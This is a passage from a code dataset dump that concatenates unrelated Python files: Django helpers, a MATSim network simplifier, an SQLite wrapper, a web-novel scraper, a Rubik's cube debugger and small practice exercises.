scores = None\n weighted_features = image_features\n\n h_mu, h_log_variance, decoded_features = self.vae(weighted_features)\n\n return scores, h_mu, h_log_variance, decoded_features\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"mcsf-intermediate-fusion/layers/summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"440738179","text":"# -*- coding: utf-8 -*-\nfrom django.conf import settings\nimport requests\n\nfrom django.contrib.auth import get_user_model\n\n\ndef find_student(identifier):\n response = requests.get(\n f'https://kobra.karservice.se/api/v1/students/{identifier}/',\n headers={'Authorization': f'Token {settings.KOBRA_API_TOKEN}'})\n\n if response.status_code == 200:\n return response.json()\n else:\n return None\n\n\ndef create_or_update_user(payload):\n \"\"\"\n Takes a Kobra payload and creates or updates a user in the database.\n \"\"\"\n return get_user_model().objects.update_or_create(\n username=payload['liu_id'],\n defaults=dict(\n email=payload['email'],\n first_name=payload['first_name'],\n last_name=payload['last_name']\n ))\n","sub_path":"cafesys/baljan/kobra.py","file_name":"kobra.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"112563764","text":"\"\"\"\n 练习:在控制台中录入多个人的喜好\n\n\"\"\"\n\"\"\"\n{\n \"张三\":[”爱好1“,”爱好2“, ”爱好3“]\n}\n\"\"\"\ndict_01 = {}\n\nwhile True:\n name = input(\"请输入姓名:\")\n if name == \"\":\n break\n # dict_01[name] = []\n list_hobby = []\n while True:\n hobby = input(\"请输入爱好:\")\n if hobby == \"\":\n break\n list_hobby.append(hobby)\n dict_01[name] = list_hobby\n\nfor k, value in dict_01.items():\n print(\"姓名:%s 爱好:\" % k, end=\" \")\n for item in value:\n print(item, end=\",\")\n","sub_path":"day06/exo02.py","file_name":"exo02.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"160433215","text":"import argparse\nimport json\nimport logging\nimport os\nimport time\n\nfrom genet import read_matsim\nfrom genet.utils.persistence import ensure_dir\n\nif __name__ == '__main__':\n arg_parser = argparse.ArgumentParser(description='Simplify a MATSim network by removing '\n 'intermediate links from paths')\n\n arg_parser.add_argument('-n',\n '--network',\n help='Location of the network.xml file',\n required=True)\n\n arg_parser.add_argument('-s',\n '--schedule',\n help='Location of the schedule.xml file',\n required=False,\n default=None)\n\n arg_parser.add_argument('-v',\n '--vehicles',\n help='Location of the vehicles.xml file',\n required=False,\n default=None)\n\n arg_parser.add_argument('-p',\n '--projection',\n help='The projection network is in, eg. \"epsg:27700\"',\n required=True)\n\n arg_parser.add_argument('-np',\n '--processes',\n help='The number of processes to split computation across',\n required=False,\n default=1,\n type=int)\n\n arg_parser.add_argument('-od',\n '--output_dir',\n help='Output directory for the simplified network',\n required=True)\n\n args = vars(arg_parser.parse_args())\n network = args['network']\n schedule = args['schedule']\n vehicles = args['vehicles']\n projection = args['projection']\n processes = args['processes']\n output_dir = args['output_dir']\n ensure_dir(output_dir)\n\n logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.WARNING)\n\n logging.info('Reading in network at {}'.format(network))\n n = read_matsim(\n path_to_network=network,\n epsg=projection,\n path_to_schedule=schedule,\n path_to_vehicles=vehicles\n )\n\n logging.info('Simplifying the Network.')\n\n start = time.time()\n n.simplify(no_processes=processes)\n end = time.time()\n\n logging.info(\n f'Simplification resulted in {len(n.link_simplification_map)} links being simplified.')\n with open(os.path.join(output_dir, 'link_simp_map.json'), 'w', encoding='utf-8') as f:\n json.dump(n.link_simplification_map, f, ensure_ascii=False, indent=4)\n\n n.write_to_matsim(output_dir)\n\n logging.info('Generating validation report')\n report = n.generate_validation_report()\n logging.info(f'Graph validation: {report[\"graph\"][\"graph_connectivity\"]}')\n if n.schedule:\n logging.info(f'Schedule level validation: {report[\"schedule\"][\"schedule_level\"][\"is_valid_schedule\"]}')\n logging.info(f'Routing validation: {report[\"routing\"][\"services_have_routes_in_the_graph\"]}')\n\n n.generate_standard_outputs(os.path.join(output_dir, 'standard_outputs'))\n\n logging.info(f'It took {round((end - start)/60, 3)} min to simplify the network.')\n","sub_path":"scripts/simplify_network.py","file_name":"simplify_network.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"33544763","text":"import sqlite3\n\n\n\nclass DBConnect:\n def __init__(self):\n self._db = sqlite3.connect(\"informations.db\")\n self._db.row_factory = sqlite3.Row\n self._db.execute(\"create table if not exists Admin(ID integer primary key autoincrement,Name text,Age int)\")\n self._db.commit()\n\n def add_records(self,name,age):\n self._db.row_factory = sqlite3.Row\n # Add records\n self._db.execute(\"insert into Admin(Name,Age) values(?,?)\", (name, age))\n self._db.commit()\n print(\"record is added\")\n def List_Data(self):\n cursor=self._db.execute(\"select * from Admin\")\n for row in cursor:\n print(\"ID = {} ... Name{} .. Age {} \".format(row[\"ID\"],row[\"Name\"],row[\"Age\"]))\n\n def deleteRecord(self,ID):\n self._db.row_factory = sqlite3.Row\n # delete records\n self._db.execute(\"delete from Admin where ID={}\".format(ID))\n self._db.commit()\n print(\"record is deleted\")\n def update (self,ID,age):\n self._db.row_factory = sqlite3.Row\n # update records by name\n self._db.execute(\"update Admin set Age=? where ID=?\",(age,ID))\n self._db.commit()\n print(\"record is updated\")\n","sub_path":"DB_Connect_Class.py","file_name":"DB_Connect_Class.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"492432931","text":"from django.shortcuts import render\nfrom Forms.models import Forms, Fields, Values, Emails,SecondValues\nfrom django.urls import reverse_lazy\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\nfrom django.template.loader import render_to_string\nfrom django.views.generic import CreateView, TemplateView\nfrom validate_email import validate_email\nfrom django.core.exceptions import ValidationError\nfrom django.core.mail import EmailMessage\n\nfrom django.http import HttpResponseForbidden, HttpResponse\nimport threading\nfrom threading import Thread\nimport sys\nfrom project import settings\nimport json\n\n\n\nclass EmailThread(threading.Thread):\n def __init__(self, subject, html_content, email_list):\n self.subject = subject\n self.email_list = email_list\n self.html_content = html_content\n threading.Thread.__init__(self)\n\n def run (self):\n msg = EmailMessage(self.subject, self.html_content, settings.EMAIL_HOST_USER, self.email_list)\n msg.content_subtype = \"html\"\n msg.send()\n\ndef send_html_mail(subject, html_content, email_list):\n EmailThread(subject, html_content, email_list).start()\n\n\nclass FormsMetm(TemplateView):\n model = Fields\n template_name = 'index.html'\n \n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n objects = Forms.objects.filter(pk=context['id']).first()\n context[\"objects\"] = objects\n \n\n return context\n\n \n def post(self, request, *args, **kwargs):\n err_list = []\n context = dict()\n objects = Forms.objects.filter(pk=kwargs['id']).first()\n # print(objects,\"FFFFFFFFFFFFFFFFFFFFFFFFFFf\")\n context[\"objects\"] = objects\n global email_value\n email_value = {}\n # print(self.request.POST[field])\n \n for field in self.request.POST: \n if field == 'csrfmiddlewaretoken':\n continue\n else:\n print(self.request.POST[field],'AAAAAAAAAAAAAAAAAAAAAA')\n \n input_name = field.split(\"-\")\n \n field_id = input_name[1]\n field_label = input_name[0]\n # print(field_label)\n fields = Fields.objects.filter(id=field_id).first().get_type()\n require = Fields.objects.filter(id=field_id ,requirement = True).first()\n # print(require,'ALALALALALAALALLAAL')\n \n \n main_field = Fields.objects.filter(label=field_label).first()\n\n is_valid = False\n if fields == '1':\n a=request.POST.get(field, \"\")\n \n \n if len(a) == 0 and require:\n \n err_list.append({field_label:'Bosh buraxmaq olmaz'})\n context[\"err_list\"] = err_list\n \n \n if fields == '2':\n nomre = request.POST.get(field, \"\")\n \n \n if len(nomre) == 0 and require:\n \n err_list.append({field_label:'bosh buraxmaq olmaz'})\n context[\"err_list\"] = err_list\n\n if not nomre.isdigit() and len(nomre)!=0:\n err_list.append({field_label:'Duzgun nomre daxil edin'})\n context[\"err_list\"] = err_list\n\n\n if fields == '6' and require:\n email = request.POST.get(field, \"\")\n if len(email) == 0:\n err_list.append({field_label:'bosh buraxmaq olmaz'})\n context[\"err_list\"] = err_list\n\n\n is_valid = validate_email(email_address=email, check_regex=True, check_mx=True, from_address='my@from.addr.ess',\n helo_host='localhost', smtp_timeout=10, dns_timeout=10, use_blacklist=True, debug=False)\n if not is_valid:\n err_list.append({field_label:'Duzgun email daxil edin'})\n context[\"err_list\"] = err_list\n\n email = request.POST.get(field, \"\")\n if fields == '6' and len(email)!=0:\n email = request.POST.get(field, \"\")\n is_valid = validate_email(email_address=email, check_regex=True, check_mx=True, from_address='my@from.addr.ess',\n helo_host='localhost', smtp_timeout=10, dns_timeout=10, use_blacklist=True, debug=False)\n if not is_valid:\n err_list.append({field_label:'Duzgun email daxil edin'})\n context[\"err_list\"] = err_list\n\n \n if len(err_list) == 0:\n \n form = SecondValues(forms=objects,\n datas=json.dumps(self.request.POST))\n form.save()\n \n for field in self.request.POST: \n if field == 'csrfmiddlewaretoken':\n continue\n else:\n dicti = {\n field : self.request.POST[field]\n }\n email_value=dicti\n subject = 'Form datas'\n emails = Emails.objects.filter(forms__id=kwargs['id']).values_list('email', flat=True)\n context = {\n 'value_list':email_value,\n }\n template_name = 'email.html'\n msg = render_to_string(template_name , context)\n template = msg\n send_html_mail(subject,template,emails) \n return render(request, 'index2.html')\n return render(request, 'index.html',context)\n\n\n\n\n\n\n","sub_path":"project/Forms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"479080403","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom multiprocessing import Pool\n\n\n# 解析一章的内容\ndef parser_a_chapter(html):\n # 解析网页\n soup = BeautifulSoup(html, 'html.parser')\n title = soup.find('h1', 'readTitle')\n print(title.get_text())\n # 获得内容\n div = soup.find(id='htmlContent')\n text = div.get_text()\n # 判断一章是否分两页\n bnt = soup.find(id='linkNext')\n if bnt.get_text() != '下一章':\n text = text + get_a_chapter(bnt['href'])\n return text\n\n# 获得一章的内容\ndef get_a_chapter(chapter_url):\n res = requests.get(chapter_url)\n res.encoding = 'gbk'\n text = parser_a_chapter(res.text)\n return text\n\n# 获得一本书的内容\ndef get_book(url):\n res = requests.get(url)\n res.encoding = 'gbk'\n soup = BeautifulSoup(res.text, 'html.parser')\n dd = soup.find_all('dd', 'col-md-3')\n title = soup.find('h1', 'bookTitle').get_text()\n print(title)\n with open(title + '.txt', 'a', encoding='utf-8') as f:\n f.write(title + '\\n')\n for i in dd:\n if i.a != None:\n text = get_a_chapter(url + i.a['href'])\n f.write(text + '\\n')\n\n\n# 爬取num页,返回list(每一页的url)\ndef get_pages(num):\n base_url = 'http://www.ddxsw.la/wanben/'\n i = 1\n ls=[]\n for i in range(num):\n url = base_url + str(i)\n res = requests.get(url)\n ls.append(res.text)\n return ls\n\n# 解析每一页,获得每本书的url,返回list\ndef parser_index_page(html_ls):\n ls = []\n for html in html_ls:\n soup = BeautifulSoup(html, 'html.parser')\n table = soup.table\n for i in table.find_all('a'):\n if i.get('class') == None:\n ls.append(i['href'])\n return ls\n\n\ndef main(url):\n get_book(url)\n\n\nif __name__ == '__main__':\n # 首先获得num页的书\n num = 2\n index_html_ls = get_pages(num)\n # 然后得到每本书的url\n books_url = parser_index_page(index_html_ls)\n # 最后用多进程爬取\n pool = Pool()\n pool.map(main, books_url)","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"592642638","text":"from Cube import*\nfrom gui.main_gui import *\n\nclass Debug:\n cube = Cube(2)\n move_list = []\n def __init__(self):\n pass\n\n @staticmethod\n def view(hash):\n if hash == None:\n return\n m = Cube(2)\n m.state = Cube.decode(hash)\n g = GUI(cube=m, player=True, width=800, height=600)\n\n while True:\n g.update()\n\n @staticmethod\n def reset(cube=Cube(2)):\n Debug.cube = cube\n Debug.move_list = [((None,None),cube.__hash__())]\n\n @staticmethod\n def addMove(move):\n Debug.move_list.append(move)\n\n @staticmethod\n def viewMoves():\n g = GUI(cube=Debug.cube, width=800, height=600)\n g.moveList(Debug.move_list)\n\n while True:\n g.update()\n\nif __name__ == '__main__':\n hash = None\n print(\"Enter the hash: \")\n Debug.view(int(input()))\n\n pass\n\n # Initial setup debug\n c = Cube(2)\n c.makeMove((1,1))\n c.makeMove((2,1))\n Debug.reset(c)\n\n # Add moves\n c.makeMove((2,3))\n Debug.addMove(((2,3), c.__hash__()))\n c.makeMove((1,3))\n Debug.addMove(((1,3), c.__hash__()))\n\n Debug.viewMoves()\n\n","sub_path":"cubeai/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"113237907","text":"import wikipedia\nfrom wikipedia.exceptions import DisambiguationError\nimport xml.dom.minidom\n\nfrom get_pos import *\nfrom get_vars import *\nimport get_medical_objects\nimport get_structural_objects\nimport get_conceptual_objects\nfrom get_medical_objects import *\nfrom get_structural_objects import *\nfrom get_conceptual_objects import *\n\ndef get_data_store(index, database, operation, args):\n '''\n this assembles an index or retrieves it from local storage,\n filtering by object_types found in the metadata argument\n '''\n downloaded = downloads(['data', 'datasets'])\n if not downloaded:\n return False\n av = get_vars()\n if av:\n data_store = {}\n ''' if index or database not passed in, fetch the local db if it exists '''\n args, filters, metadata, generate_target, generate_source = get_args(args, av)\n av['metadata'] = metadata if metadata else av['supported_params']\n for key in metadata:\n related_metadata = add_related_metadata(key, av)\n if related_metadata:\n metadata.extend(related_metadata)\n metadata = list(set(metadata))\n if operation == 'build':\n database = get_local_database('data', None) if not database else database\n data_store, rows = build_indexes(database, args, filters, av)\n elif operation == 'get_database':\n data_store = get_local_database('data', None)\n elif operation == 'get_index':\n data_store = index\n if data_store and metadata:\n new_index = {}\n for key in metadata:\n new_index[key] = data_store[key] if key in data_store else set()\n if new_index:\n return new_index\n return False\n\ndef get_data_from_source(source, keyword, av):\n articles = get_batch(source, 0, keyword, [])\n print('get_data_from_source: get_batch: articles', len(articles))\n if articles:\n if len(articles) > 0:\n data = process_articles(articles, source, keyword, av) \n print('processed articles: data', data)\n if data:\n return data\n return False\n\ndef get_batch(source, start, keyword, articles):\n print('get batch for source', start, keyword, len(articles))\n total = 0\n max_count = 10\n keyword = keyword.replace(' ', '+')\n if source['name'] == 'wiki':\n content, sections, categories = get_content_from_wiki(keyword, av)\n if content and sections and categories:\n new_articles = [content]\n else:\n url = source['url'].replace('', keyword).replace('', str(start)).replace('', str(max_count))\n print('url', url)\n response = requests.get(url)\n if response.content:\n print('response content', response.content)\n if source['response_format'] == 'xml':\n xml_string = xml.dom.minidom.parseString(response.content)\n if xml_string:\n count_tag = xml_string.documentElement.getElementsByTagName(source['count'])\n if count_tag:\n total = int(count_tag[0].childNodes[0].nodeValue)\n new_articles = xml_string.documentElement.getElementsByTagName(source['entries'])\n else:\n new_articles = json.loads(response.content)\n print('new articles', len(new_articles))\n if new_articles:\n if len(new_articles) > 0:\n articles.extend(new_articles) \n if (start + max_count) < total:\n start = start + max_count\n if start < 50:\n return get_batch(source, start, keyword, articles) \n return articles\n return False\n\ndef process_articles(articles, source, keyword, av):\n data = {}\n for article in articles:\n title = None\n article_text = None\n if source['name'] == 'pubchem':\n title, article_text = get_article_from_id(article, source)\n print('found pubchem article', article, 'title', title)\n elif source['name'] == 'wiki':\n title = keyword\n article_text = article\n else:\n title = get_text_from_nodes(article, source['title_element'])\n article_text = get_text_from_nodes(article, source['summary_element'])\n if title and article_text:\n article_lines, av = standard_text_processing(article_text, av)\n if article_lines:\n data[title] = article_lines # article_lines[line][word] = pos\n if data:\n return data\n return False\n\ndef get_article_from_id(id_value, source):\n print('get_article_from_id', id_value)\n if id_value:\n url = ''.join(['https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id=', id_value, '&retmode=xml'])\n response = requests.get(url)\n if response:\n if response.content:\n print('pubmed content', id_value, response.content)\n xml_string = xml.dom.minidom.parseString(response.content)\n if xml_string:\n title = xml_string.documentElement.getElementsByTagName(source['title_element'])[0].childNodes[0].nodeValue\n text = xml_string.documentElement.getElementsByTagName(source['summary_element'])[0].childNodes[0].nodeValue\n print('title', title)\n print('text', text)\n if title and text:\n return title, text\n return False, False\n\ndef get_text_from_nodes(entry, element_name):\n nodes = [node for node in entry.childNodes if node.nodeName == element_name]\n if len(nodes) > 0:\n text = ''.join([subnode.wholeText for node in nodes for subnode in node.childNodes])\n if len(text) > 0:\n return text\n return False\n\ndef add_row(row, index, empty_index, rows):\n if row:\n if row != empty_index:\n for key, val in row.items():\n if type(val) == dict:\n row[key] = '::'.join(['_'.join([k,v]) for k,v in val.items()])\n elif type(val) == set or type(val) == list:\n row[key] = str('::'.join(set(val)))\n elif type(val) == bool:\n row[key] = '1' if val is True else '0'\n index[key] = index[key].add(row[key])\n rows.append(row)\n return index, rows\n\ndef build_indexes(database, args, filters, av):\n ''' \n - this function indexes data from api providing articles\n - if the local database is found, use that as starting index, otherwise build it\n '''\n rows = []\n empty_index = get_empty_index(av)\n index = database if database else empty_index if empty_index else None\n for arg in args:\n for source in av['sources']:\n data = get_data_from_source(source, arg, av)\n if data:\n print('data', data)\n exit()\n for title, article_lines in data.items():\n for line, word_map in article_lines.items():\n row = get_metadata(line, title, word_map, av)\n if row:\n index, rows = add_row(row, index, empty_index, rows)\n if index and rows:\n write_csv(rows, index.keys(), 'data/rows.csv')\n return index, rows\n return False, False\n\ndef get_metadata(line, title, word_map, av):\n ''' \n this function initializes the row object & populates it with various metadata types:\n - structural_types to get nouns, verbs, phrases, modifiers, clauses, & relationships\n - medical_types to get conditions, symptoms, & treatments in the sentence \n - conceptual_types to get types, strategies & insights\n '''\n row = get_empty_index(av) \n row['line'] = line\n row['word_map'] = word_map\n row['original_line'] = line\n row = replace_names(row, av)\n row = get_similarity_to_title(title, row)\n row = get_structural_metadata(row, av)\n print('\\nrow with structural metadata', row)\n for metadata_type in ['medical_types', 'conceptual_types']:\n for object_type in av[metadata_type]:\n if object_type in av['metadata']:\n for search_pattern_key in av['computed_pattern_index']:\n # check that this data 'strategy', 'treatment' was requested and is supported in pattern_index\n print('\\nget metadata', object_type, search_pattern_key)\n objects, patterns, av = extract_objects_and_patterns(row, object_type, search_pattern_key, av)\n if objects:\n if objects[object_type] != row.keys():\n row[object_type] = set(row[object_type]).union(set(objects[object_type]))\n if patterns:\n joined_key = '_'.join([object_type, search_pattern_key])\n if joined_key not in row['pattern']:\n row['pattern'][joined_key] = set()\n for p in patterns:\n row['pattern'][joined_key].add(p)\n print('\\nmedical objects', row)\n return row\n\ndef extract_objects_and_patterns(row, object_type, search_pattern_key, av):\n '''\n - this function finds subsets & objects matching patterns from search_pattern_key patterns in row[object_type] data\n 1. find any matches from search_pattern_key patterns in row[object_type] data\n 2. if pattern matches found in lines, \n find objects in matches with type-specific logic from find_ function\n 3. if no pattern matches found in lines, \n find objects in lines with type-specific logic from find_ function\n - object_type is the key in object types supported in av['full_params'] to find: ['treatment', 'condition', 'strategy']\n - search_pattern_key is the type of av['pattern_index'] patterns to search: ['modifier', 'type', 'role']\n - object_type may equal search_pattern_key\n '''\n object_type = object_type if object_type in row else 'line'\n if row:\n if object_type in av['metadata'] or av['metadata'] == 'all' and object_type in row:\n all_patterns = {}\n all_objects = {}\n data = row[object_type] if type(row[object_type]) == list else [row[object_type]]\n for item in data:\n found_objects, found_patterns, av = get_patterns_and_objects_in_line(item, search_pattern_key, row, object_type, av)\n if found_patterns:\n for pattern_key, patterns in found_patterns.items():\n if pattern_key not in all_patterns:\n all_patterns[pattern_key] = {}\n for pattern, matches in patterns.items():\n if pattern not in all_patterns[pattern_key]:\n all_patterns[pattern_key][pattern] = set()\n all_patterns[pattern_key][pattern] = all_patterns[pattern_key][pattern].union(matches)\n if not found_objects:\n ''' \n if there are no matches found for object_type patterns, \n do a standard object query independent of patterns to apply type-specific logic \n '''\n found_objects = apply_find_function(object_type, item, row, av)\n if found_objects:\n print('find function objects', object_type, found_objects)\n if object_type not in all_objects:\n all_objects[object_type] = set()\n all_objects[object_type] = all_objects[object_type].union(found_objects)\n if all_objects or all_patterns:\n print('extracted objects', all_objects, 'patterns', all_patterns)\n return all_objects, all_patterns, av\n return False, False, av\n\ndef get_patterns_and_objects_in_line(line, search_pattern_key, row, object_type, av):\n ''' the reason we allow search_pattern_key and object_type to differ is to find subset matches \n example: \n find 'modifiers' in 'treatment patterns' would have:\n object_type = 'modifier' and search_pattern_key = 'treatment'\n '''\n found_objects = set()\n found_patterns, av = get_matching_subsets(line, search_pattern_key, av)\n if found_patterns and object_type != 'pattern':\n for pattern_type in found_patterns:\n for pattern, matches in found_patterns[pattern_type].items():\n ''' filter pattern matches for this type before adding them, with type-specific logic in find_* functions '''\n ''' note: this is not restricting output to found objects '''\n for m in matches:\n objects_found = apply_find_function(object_type, m, row, av)\n if objects_found:\n found_objects = found_objects.union(objects_found)\n if found_patterns or found_objects:\n return found_objects, found_patterns, av\n return False, False, av\n\ndef apply_find_function(object_type, subset, row, av):\n ''' find functions check for objects of object_type in matches list which match pattern \n - all find object functions need to support params:\n - subset, row, av\n - subsets = 'dog of cat', 'cat of dog' (matches for pattern 'x of y')\n '''\n function_name = ''.join(['find_', object_type])\n if function_name in globals():\n if function_name:\n if get_structural_objects and get_conceptual_objects and get_medical_objects and get_vars:\n function = None\n for package in [get_structural_objects, get_conceptual_objects, get_medical_objects, get_vars]:\n try:\n function = getattr(package, function_name)\n except Exception as e:\n continue\n if function:\n got_objects = function(subset, row, av)\n if got_objects:\n if len(got_objects) > 0:\n return set([item for item in got_objects])\n return False\n\ndef get_structural_metadata(row, av):\n '''\n 1. identifies 'ngram', 'modifier', 'phrase', 'noun_phrase', 'verb_phrase', 'clause', 'subject', 'pattern'\n 2. then assembles conditions of sentence & executes order_clauses on conditions\n 3. then identifies 'relationship' objects from sentence conditions\n verb-noun-phrases should be converted into modifiers\n once you have the nouns/modifiers, you can pick a subject from the noun or modifier\n '''\n print('\\n\\nget_structural_metadata', row)\n keep_ratios = ['extra', 'high', 'none']\n corrected_line = correct(row['line'])\n print('row', row)\n row['line'] = corrected_line if corrected_line else row['line']\n if row['line'] != '':\n generated_patterns, av = get_all_versions(row['line'], 'all', av)\n if generated_patterns:\n print('generated_patterns', generated_patterns)\n for pattern_type, patterns in generated_patterns.items():\n if pattern_type not in row['pattern']:\n row['pattern'][pattern_type] = set()\n if len(patterns) > 0:\n for pattern in patterns:\n print('pattern', pattern)\n row['pattern'][pattern_type].add(pattern)\n word_pos_line = ''.join([x for x in row['line'] if x in av['alphanumeric'] or x in av['clause_analysis_chars']])\n print('\\nword pos line', word_pos_line)\n words = word_pos_line.split(' ')\n new_line = []\n max_words, counts = get_common_words(row['line'], 3, av)\n if max_words and counts:\n row['count'] = counts\n row['common_word'] = max_words\n names = get_names(row['line'])\n if names:\n row['names'] = names\n for i, w in enumerate(words):\n if len(w) > 0:\n pos = row['word_map'][w] if row['word_map'] and w in row['word_map'] else get_nltk_pos(w, av)\n if pos:\n if pos in av['tags']['VC']:\n row['clause_marker'].add(w)\n if pos in av['tags']['ALL_N'] or w in av['alphabet'] or pos == 'N':\n ''' format nouns like 'inhibitor' or 'catalyzer' as a verb '''\n present_verb = conjugate(w, 'VBZ', av)\n if present_verb:\n row['verb'].add(present_verb)\n new_line.append(present_verb)\n else:\n row['noun'].add(w)\n new_line.append(w)\n elif pos in av['tags']['ALL_V'] or pos == 'V':\n ''' dont conjugate '-ing' to preserve verb-noun modifier phrases '''\n present_verb = conjugate(w, 'VBZ', av)\n if present_verb:\n row['verb'].add(present_verb)\n new_line.append(present_verb)\n else:\n row['verb'].add(w)\n new_line.append(w)\n elif pos in av['tags']['D'] or pos == 'D':\n ratio = get_determiner_ratio(w)\n if ratio:\n if ratio in keep_ratios:\n row['det'].add(str(ratio))\n new_line.append(str(ratio))\n elif pos in av['tags']['P'] or pos == 'P':\n row['prep'].add(w)\n new_line.append(w)\n elif pos in av['tags']['C'] or pos == 'C':\n row['conj'].add(w)\n new_line.append(w)\n elif pos in av['tags']['ADV'] or pos in av['tags']['ADJ'] or pos == 'ADJ' or pos in av['tags']['ADV'] or pos in av['tags']['ADV'] or pos == 'ADV':\n row['descriptor'].add(w)\n new_line.append(w)\n else:\n row['taken_out'].add('_'.join([w, str(pos)]))\n else:\n if w in av['alphabet']:\n row['noun'].add(w)\n new_line.append(w)\n row['line'] = ' '.join(new_line) if len(new_line) > 0 else word_pos_line\n print('\\ninterim row', row)\n ngrams = find_ngrams(row['line'], av) # 'even with', 'was reduced', 'subject position'\n if ngrams:\n for k, v in ngrams.items():\n row['ngram'] = row['ngram'].union(v)\n print('\\nngrams', row['ngram'])\n for key, value in row.items():\n print('key', key, value)\n structure_types = ['modifier', 'phrase', 'verb_phrase', 'noun_phrase', 'clause']\n for i, key in enumerate(structure_types):\n if len(row[key]) > 0:\n objects, patterns, av = extract_objects_and_patterns(row, key, key, av)\n if objects:\n print('\\n\\n\\nobjects', key, objects)\n if key in objects:\n if key == 'verb_phrase':\n for item in objects[key]:\n new_list = []\n for w in item.split(' '):\n pos = get_nltk_pos(w, av)\n if pos:\n present_verb = conjugate(w, 'VBZ', av)\n if present_verb:\n new_list.append(present_verb)\n else:\n new_list.append(w)\n else:\n new_list.append(w)\n if len(new_list) > 0:\n row[key].add(' '.join(new_list))\n elif key == 'subject':\n for item in objects[key]:\n row[key].add(item.split(' ')[0]) # to do: remove trailing verb in 'N V' subject pattern\n elif key == 'clause':\n row[key] = objects[key]\n else:\n print('objects key', key)\n row[key] = set(row[key]).union(set(objects[key]))\n if patterns:\n for pattern_type in patterns:\n if pattern_type not in row['pattern']:\n row['pattern'][pattern_type] = set()\n row['pattern'][pattern_type] = row['pattern'][pattern_type].union(patterns[pattern_type])\n print('\\nafter pattern identification')\n for key, value in row.items():\n print('key', key, value)\n new_row = find_relationship(row['line'], row, av)\n row = new_row if new_row else row\n print('\\nafter relationships', row)\n if len(row['relationship']) > 0:\n objects, patterns, av = extract_objects_and_patterns(row, 'relationship', 'relationship', av)\n if objects:\n if 'relationship' in objects:\n row['relationship'] = row['relationship'].union(set(objects['relationship']))\n if patterns:\n for pattern_key in patterns:\n if pattern_key not in row['pattern']:\n row['pattern'][pattern_key] = set()\n row['pattern'][pattern_key] = row['pattern'][pattern_key].union(patterns[pattern_key])\n if row:\n for key in row:\n print('key', key, row[key])\n return row\n return False\n\ndef assemble_pattern_indexes(object_types):\n all_derived_patterns = get_empty_index(av)\n object_types = object_types if object_types != 'all' else all_derived_patterns.keys()\n for object_type in object_types:\n if object_type in all_derived_patterns:\n print('deriving objects for type', object_type)\n derived_patterns, articles, av = derive_and_store_patterns(object_type, av)\n if derived_patterns:\n for ep in derived_patterns:\n print('derived pattern', ep)\n if object_type not in all_derived_patterns:\n all_derived_patterns[object_type] = set()\n all_derived_patterns[object_type].add(ep)\n if all_derived_patterns:\n return all_derived_patterns\n return False\n\nif sys.argv:\n index = get_data_store(None, None, 'build', sys.argv)\n print('get_data_store:index', index)\n\n","sub_path":"find_existing_solutions/get_metadata.py","file_name":"get_metadata.py","file_ext":"py","file_size_in_byte":22933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"20308283","text":"\n#Name: Jaron Huang\n#Date: Augsut 30, 2018\n#This program prints out the length and percentage of GC in a DNA string.\n\na = input(\"Enter a DNA string: \")\n\nprint(len(a))\n\nc = 0\n\nfor i in a:\n if (i == \"G\" or i == \"C\"):\n c += 1\n\nprint(c/len(a))\n","sub_path":"Lab9.py","file_name":"Lab9.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"568789683","text":"'''\n\nA SÉRIE DE RICCI DEFERE DA SERIE DE FIBONACCI PROQUE OS DOIS PRIMEIROS TERMOS SÃO FORNECIDOS PELO\nUSUÁRIO. OS DEMAIS TERMOS SÃO GERADOS DA MESMA FORMA QUE A SERIE DE FIBONACCI. CRIAR UM ALGORITMO\nQUE IMRIMA OS N PRIMEIROS TERMOS DA SERIE DE RICCI E A SOMA DOS TERMOS IMPRESSOS, SABENDO - SE QUE PARA\nEXISTIR ESTA SERIE SERÃO NECESSÁRIO PELO MENOS TRES TERMOS.\n\n'''\n\ntermo = int\n\na1 = int(input('Entre com o primeiro termo: '))\na2 = int(input('Entre com o segundo termo: '))\nn = int(input('Entre com N termos: '))\nsoma = a1 + a2\nif n >= 3:\n print('{} - {}'.format(a1,a2))\n\n for i in range(1,(n-2)+1):\n termo = a1 + a2\n a1 = a2\n a2 = termo\n print(termo, end=' | ')\n soma = soma + termo\n print(soma, end=' ')\nelse:\n print('Não tem termo')","sub_path":"Prog_209_pag_150.py","file_name":"Prog_209_pag_150.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"590236572","text":"import json\r\nfrom collections import namedtuple\r\nimport discord\r\n\r\ndef read_json_as_tuple(file):\r\n try:\r\n with open(file, encoding='utf8') as data:\r\n return json.load(data, object_hook=lambda d: namedtuple('X', d.keys())(*d.values()))\r\n except Exception as e:\r\n print(e)\r\n\r\ndef read_json_raw(file):\r\n try:\r\n with open(file, encoding='utf8') 